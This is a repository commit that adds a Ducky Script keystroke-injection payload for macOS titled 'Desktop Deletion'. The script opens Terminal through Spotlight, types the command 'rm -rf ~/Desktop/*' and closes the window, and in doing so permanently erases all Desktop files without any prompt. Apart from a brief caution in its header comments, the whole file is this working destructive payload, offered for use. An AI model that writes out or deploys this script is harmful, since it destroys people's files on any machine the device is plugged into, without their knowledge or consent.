Add files via upload
This commit is contained in:
@@ -0,0 +1,22 @@
|
||||
REM Title: Desktop Deletion
|
||||
REM Author: NARSTY
|
||||
REM Description: Opens Terminal and enters commands to delete ALL files and folders located on Desktop
|
||||
REM Please exercise caution when using this command
|
||||
REM It will permanently delete all files & Folder on the desktop without any confirmation prompts
|
||||
REM Target: MacOS
|
||||
REM Version: 1.0
|
||||
REM Category: Execution
|
||||
|
||||
DELAY 300
|
||||
GUI SPACE
|
||||
DELAY 500
|
||||
STRING terminal.app
|
||||
DELAY 1000
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING rm -rf ~/Desktop/*
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 2000
|
||||
GUI W
|
||||
|
||||
Reference in New Issue
Block a user